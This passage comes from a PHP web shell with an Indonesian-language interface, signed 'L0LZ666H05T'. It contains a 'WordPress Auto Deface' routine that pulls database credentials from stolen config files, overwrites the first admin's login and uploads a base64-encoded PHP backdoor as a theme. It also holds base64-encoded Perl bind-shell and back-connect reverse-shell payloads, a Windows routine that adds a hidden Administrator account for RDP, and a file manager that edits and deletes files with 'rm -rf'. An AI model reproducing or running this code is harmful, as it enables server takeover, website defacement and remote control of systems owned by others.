2144. $user = "nusantarablackhat";
2145. $pass = "nusantarablackhat";
2146. $passx = md5($pass);
2147. foreach($link as $dir_config) {
2148. $config = anucurl($dir_config);
2149. $dbhost = ambilkata($config,"DB_HOST', '","'");
2150. $dbuser = ambilkata($config,"DB_USER', '","'");
2151. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2152. $dbname = ambilkata($config,"DB_NAME', '","'");
2153. $dbprefix = ambilkata($config,"table_prefix = '","'");
2154. $prefix = $dbprefix."users";
2155. $option = $dbprefix."options";
2156. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2157. $db = mysql_select_db($dbname);
2158. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2159. $result = mysql_fetch_array($q);
2160. $id = $result[ID];
2161. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2162. $result2 = mysql_fetch_array($q2);
2163. $target = $result2[option_value];
2164. if($target == '') {
2165. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2166. } else {
2167. echo "[+] $target <br>";
2168. }
2169. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2170. if(!$conn OR !$db OR !$update) {
2171. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2172. mysql_close($conn);
2173. } else {
2174. $site = "$target/wp-login.php";
2175. $site2 = "$target/wp-admin/theme-install.php?upload";
2176. $b1 = anucurl($site2);
2177. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2178. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2179. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2180. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2181. $www = "m.php";
2182. $fp5 = fopen($www,"w");
2183. fputs($fp5,$upload3);
2184. $post2 = array(
2185. "_wpnonce" => "$anu2",
2186. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2187. "themezip" => "@$www",
2188. "install-theme-submit" => "Install Now",
2189. );
2190. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2191. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2192. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2193. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2194. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2195. curl_setopt($ch, CURLOPT_POST, 1);
2196. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2197. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2198. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2199. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2200. $data3 = curl_exec($ch);
2201. curl_close($ch);
2202. $y = date("Y");
2203. $m = date("m");
2204. $namafile = "id.php";
2205. $fpi = fopen($namafile,"w");
2206. fputs($fpi,$script);
2207. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2208. curl_setopt($ch6, CURLOPT_POST, true);
2209. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2210. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2211. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2212. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2213. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2214. $postResult = curl_exec($ch6);
2215. curl_close($ch6);
2216. $as = "$target/k.php";
2217. $bs = anucurl($as);
2218. if(preg_match("#$script#is", $bs)) {
2219. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2220. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2221. } else {
2222. echo "[-] <font color='red'>gagal mepes...</font><br>";
2223. echo "[!!] coba aja manual: <br>";
2224. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2225. echo "[+] username: <font color=lime>$user</font><br>";
2226. echo "[+] password: <font color=lime>$pass</font><br><br>";
2227. }
2228. mysql_close($conn);
2229. }
2230. }
2231. } else {
2232. echo "<center><h1>WordPress Auto Deface V.2</h1>
2233. <form method='post'>
2234. Link Config: <br>
2235. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2236. <input type='text' name='script' height='10' size='50' placeholder='Hacked by L0LZ666H05T' required><br>
2237. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2238. </form></center>";
2239. }
2240. } elseif($_GET['do'] == 'network') {
2241. echo "<center>";
2242. echo "<form method='post'>
2243. <u>Bind Port:</u> <br>
2244. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2245. <input type='submit' name='sub_bp' value='&#10150;'>
2246. </form>
2247. <form method='post'>
2248. <u>Back Connect:</u> <br>
2249. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2250. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2251. <input type='submit' name='sub_bc' value='&#10150;'>
2252. </form>";
2253. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2254. if(isset($_POST['sub_bp'])) {
2255. $f_bp = fopen("/tmp/bp.pl", "w");
2256. fwrite($f_bp, base64_decode($bind_port_p));
2257. fclose($f_bp);
2258.  
2259. $port = $_POST['port_bind'];
2260. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2261. sleep(1);
2262. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2263. unlink("/tmp/bp.pl");
2264. }
2265. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2266. if(isset($_POST['sub_bc'])) {
2267. $f_bc = fopen("/tmp/bc.pl", "w");
2268. fwrite($f_bc, base64_decode($bind_connect_p));
2269. fclose($f_bc);
2270.  
2271. $ipbc = $_POST['ip_bc'];
2272. $port = $_POST['port_bc'];
2273. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2274. sleep(1);
2275. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2276. unlink("/tmp/bc.pl");
2277. }
2278. } elseif($_GET['do'] == 'krdp_shell') {
2279. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2280. if($_POST['create']) {
2281. $user = htmlspecialchars($_POST['user']);
2282. $pass = htmlspecialchars($_POST['pass']);
2283. if(preg_match("/$user/", exe("net user"))) {
2284. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
2285. } else {
2286. $add_user = exe("net user $user $pass /add");
2287. $add_groups1 = exe("net localgroup Administrators $user /add");
2288. $add_groups2 = exe("net localgroup Administrator $user /add");
2289. $add_groups3 = exe("net localgroup Administrateur $user /add");
2290. echo "[ RDP ACCOUNT INFO ]<br>
2291. ------------------------------<br>
2292. IP: <font color=lime>".$ip."</font><br>
2293. Username: <font color=lime>$user</font><br>
2294. Password: <font color=lime>$pass</font><br>
2295. ------------------------------<br><br>
2296. [ STATUS ]<br>
2297. ------------------------------<br>
2298. ";
2299. if($add_user) {
2300. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2301. } else {
2302. echo "[add user] -> <font color='red'>Gagal</font><br>";
2303. }
2304. if($add_groups1) {
2305. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2306. } elseif($add_groups2) {
2307. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2308. } elseif($add_groups3) {
2309. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2310. } else {
2311. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2312. }
2313. echo "------------------------------<br>";
2314. }
2315. } elseif($_POST['s_opsi']) {
2316. $user = htmlspecialchars($_POST['r_user']);
2317. if($_POST['opsi'] == '1') {
2318. $cek = exe("net user $user");
2319. echo "Checking username <font color=lime>$user</font> ....... ";
2320. if(preg_match("/$user/", $cek)) {
2321. echo "[ <font color=lime>Sudah ada</font> ]<br>
2322. ------------------------------<br><br>
2323. <pre>$cek</pre>";
2324. } else {
2325. echo "[ <font color=red>belum ada</font> ]";
2326. }
2327. } elseif($_POST['opsi'] == '2') {
2328. $cek = exe("net user $user nusantarablackhat");
2329. if(preg_match("/$user/", exe("net user"))) {
2330. echo "[change password: <font color=lime>nusantarablackhat</font>] -> ";
2331. if($cek) {
2332. echo "<font color=lime>Berhasil</font>";
2333. } else {
2334. echo "<font color=red>Gagal</font>";
2335. }
2336. } else {
2337. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2338. }
2339. } elseif($_POST['opsi'] == '3') {
2340. $cek = exe("net user $user /DELETE");
2341. if(preg_match("/$user/", exe("net user"))) {
2342. echo "[remove user: <font color=lime>$user</font>] -> ";
2343. if($cek) {
2344. echo "<font color=lime>Berhasil</font>";
2345. } else {
2346. echo "<font color=red>Gagal</font>";
2347. }
2348. } else {
2349. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2350. }
2351. } else {
2352. //
2353. }
2354. } else {
2355. echo "-- Create RDP --<br>
2356. <form method='post'>
2357. <input type='text' name='user' placeholder='username' value='nusantarablackhat' required>
2358. <input type='text' name='pass' placeholder='password' value='nusantarablackhat' required>
2359. <input type='submit' name='create' value='>>'>
2360. </form>
2361. -- Option --<br>
2362. <form method='post'>
2363. <input type='text' name='r_user' placeholder='username' required>
2364. <select name='opsi'>
2365. <option value='1'>Cek Username</option>
2366. <option value='2'>Ubah Password</option>
2367. <option value='3'>Hapus Username</option>
2368. </select>
2369. <input type='submit' name='s_opsi' value='>>'>
2370. </form>
2371. ";
2372. }
2373. } else {
2374. echo "<center><font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2375. }
2376. } elseif($_GET['act'] == 'newfile') {
2377. if($_POST['new_save_file']) {
2378. $newfile = htmlspecialchars($_POST['newfile']);
2379. $fopen = fopen($newfile, "a+");
2380. if($fopen) {
2381. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2382. } else {
2383. $act = "<font color=red>permission denied</font>";
2384. }
2385. }
2386. echo $act;
2387. echo "<form method='post'>
2388. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2389. <input type='submit' name='new_save_file' value='Submit'>
2390. </form>";
2391. } elseif($_GET['act'] == 'newfolder') {
2392. if($_POST['new_save_folder']) {
2393. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2394. if(!mkdir($new_folder)) {
2395. $act = "<font color=red>permission denied</font>";
2396. } else {
2397. $act = "<script>window.location='?dir=".$dir."';</script>";
2398. }
2399. }
2400. echo $act;
2401. echo "<form method='post'>
2402. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2403. <input type='submit' name='new_save_folder' value='Submit'>
2404. </form>";
2405. } elseif($_GET['act'] == 'rename_dir') {
2406. if($_POST['dir_rename']) {
2407. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2408. if($dir_rename) {
2409. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2410. } else {
2411. $act = "<font color=red>permission denied</font>";
2412. }
2413. echo "".$act."<br>";
2414. }
2415. echo "<form method='post'>
2416. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2417. <input type='submit' name='dir_rename' value='rename'>
2418. </form>";
2419. } elseif($_GET['act'] == 'delete_dir') {
2420. if(is_dir($dir)) {
2421. if(is_writable($dir)) {
2422. @rmdir($dir);
2423. @exe("rm -rf $dir");
2424. @exe("rmdir /s /q $dir");
2425. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2426. } else {
2427. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2428. }
2429. }
2430. echo $act;
2431. } elseif($_GET['act'] == 'view') {
2432. echo "Nama File: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>Lihat</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Ganti Nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2433. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2434. } elseif($_GET['act'] == 'edit') {
2435. if($_POST['save']) {
2436. $save = file_put_contents($_GET['file'], $_POST['src']);
2437. if($save) {
2438. $act = "<script>alert('Edit sukses :)')</script>";
2439. } else {
2440. $act = "<script>alert('Edit gagal :(')</script>";
2441. }
2442. echo "".$act."<br>";
2443. }
2444. echo "<center>Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>Lihat</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Ganti Nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2445. echo "<form method='post'>
2446. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2447. <center><input type='submit' value='Save' name='save' style='width: 500px;'></center>
2448. </form>";
2449. } elseif($_GET['act'] == 'rename') {
2450. if($_POST['do_rename']) {
2451. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2452. if($rename) {
2453. $act = "<script>window.location='?dir=".$dir."';</script>";
2454. } else {
2455. $act = "<font color=red>permission denied</font>";
2456. }
2457. echo "".$act."<br>";
2458. }
2459. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2460. echo "<form method='post'>
2461. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2462. <input type='submit' name='do_rename' value='rename'>
2463. </form>";
2464. } elseif($_GET['act'] == 'delete') {
2465. $delete = unlink($_GET['file']);
2466. if($delete) {
2467. $act = "<script>window.location='?dir=".$dir."';</script>";
2468. } else {
2469. $act = "<font color=red>permission denied</font>";
2470. }
2471. echo $act;
2472. } else {
2473. if(is_dir($dir) === true) {
2474. if(!is_readable($dir)) {
2475. echo "<font color=red>can't open directory. ( not readable )</font>";
2476. } else {
2477. echo "<div class='sad'>";
2478. echo '<table width="100%" class="table_home" border="1" cellpadding="3" cellspacing="1" align="center">
2479. <tr>
2480. <th class="th_home"><center>Nama</center></th>
2481. <th class="th_home"><center>Tipe</center></th>
2482. <th class="th_home"><center>Ukuran</center></th>
2483. <th class="th_home"><center>Perubahan</center></th>
2484. <th class="th_home"><center>Pemilik</center></th>
2485. <th class="th_home"><center>Permohonan</center></th>
2486. <th class="th_home"><center>Aksi</center></th>
2487. </tr>';
2488. echo "<div class='sad'>";
2489. $scandir = scandir($dir);
2490. foreach($scandir as $dirx) {
2491. $dtype = filetype("$dir/$dirx");
2492. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2493. if(function_exists('posix_getpwuid')) {
2494. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2495. $downer = $downer['name'];
2496. } else {
2497. //$downer = $uid;
2498. $downer = fileowner("$dir/$dirx");
2499. }
2500. if(function_exists('posix_getgrgid')) {
2501. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2502. $dgrp = $dgrp['name'];
2503. } else {
2504. $dgrp = filegroup("$dir/$dirx");
2505. }
2506. if(!is_dir("$dir/$dirx")) continue;
2507. if($dirx === '..') {
2508. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2509. } elseif($dirx === '.') {
2510. $href = "<a href='?dir=$dir'>$dirx</a>";
2511. } else {
2512. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2513. }
2514. if($dirx === '.' || $dirx === '..') {
2515. $act_dir = "<center><a href='?act=newfile&dir=$dir'>File Baru</a> <font color='Dimgray'>|</font> <a href='?act=newfolder&dir=$dir'>Folder Baru</a>";
2516. } else {
2517. $act_dir = "<center><a href='?act=rename_dir&dir=$dir/$dirx'>Ganti Nama</a> <font color='Dimgray'>|</font> <a href='?act=delete_dir&dir=$dir/$dirx'>Hapus</a>";
2518. }
2519. echo "<tr>";
2520. echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/uriy1966/steel-system/24/Games-icon.png'>$href</td>";
2521. echo "<td class='td_home'><center>$dtype</center></td>";
2522. echo "<td class='td_home'><center><font color='gold'>-</center></font></th></td>";
2523. echo "<td class='td_home'><center><font color='red'>$dtime</center></font></td>";
2524. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2525. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2526. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2527. echo "</tr>";
2528. echo "</div>";
2529. }
2530. }
2531. } else {
2532. echo "<font color=red>can't open directory.</font>";
2533. }
2534. foreach($scandir as $file) {
2535. $ftype = filetype("$dir/$file");
2536. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2537. $size = filesize("$dir/$file")/1024;
2538. $size = round($size,3);
2539. if(function_exists('posix_getpwuid')) {
2540. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2541. $fowner = $fowner['name'];
2542. } else {
2543. //$downer = $uid;
2544. $fowner = fileowner("$dir/$file");
2545. }
2546. if(function_exists('posix_getgrgid')) {
2547. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2548. $fgrp = $fgrp['name'];
2549. } else {
2550. $fgrp = filegroup("$dir/$file");
2551. }
2552. if($size > 1024) {
2553. $size = round($size/1024,2). 'MB';
2554. } else {
2555. $size = $size. 'KB';
2556. }
2557. if(!is_file("$dir/$file")) continue;
2558. echo "<tr>";
2559. echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/double-j-design/origami-colored-pencil/24/green-document-cross-icon.png'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2560. echo "<td class='td_home'><center>$ftype</center></td>";
2561. echo "<td class='td_home'><center><font color='gold'>$size</center></font></td>";
2562. echo "<td class='td_home'><center><font color='red'>$ftime</center></font></td>";
2563. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2564. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2565. echo "<td class='td_home' style='padding-left: 15px;'><center><a href='?act=edit&dir=$dir&file=$dir/$file'>Edit</a> <font color='Dimgray'>|</font> <a href='?act=rename&dir=$dir&file=$dir/$file'>Ganti Nama</a> <font color='Dimgray'>|</font> <a href='?act=delete&dir=$dir&file=$dir/$file'>Hapus</a> <font color='Dimgray'>|</font> <a href='?act=download&dir=$dir&file=$dir/$file'>Download</a></td>";
2566. echo "</tr>";
2567. }
2568. echo "</table>";
2569. if(!is_readable($dir)) {
2570. //
2571. } else {
2572. echo "<hr color='Dimgray'>";
2573. }
2574. echo "<center>Copyright &copy; ".date("Y")." - <font color=dimgray>L0LZ666H05T</font></a></center>";
2575. }
2576. ?>
2577. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
2578. </html>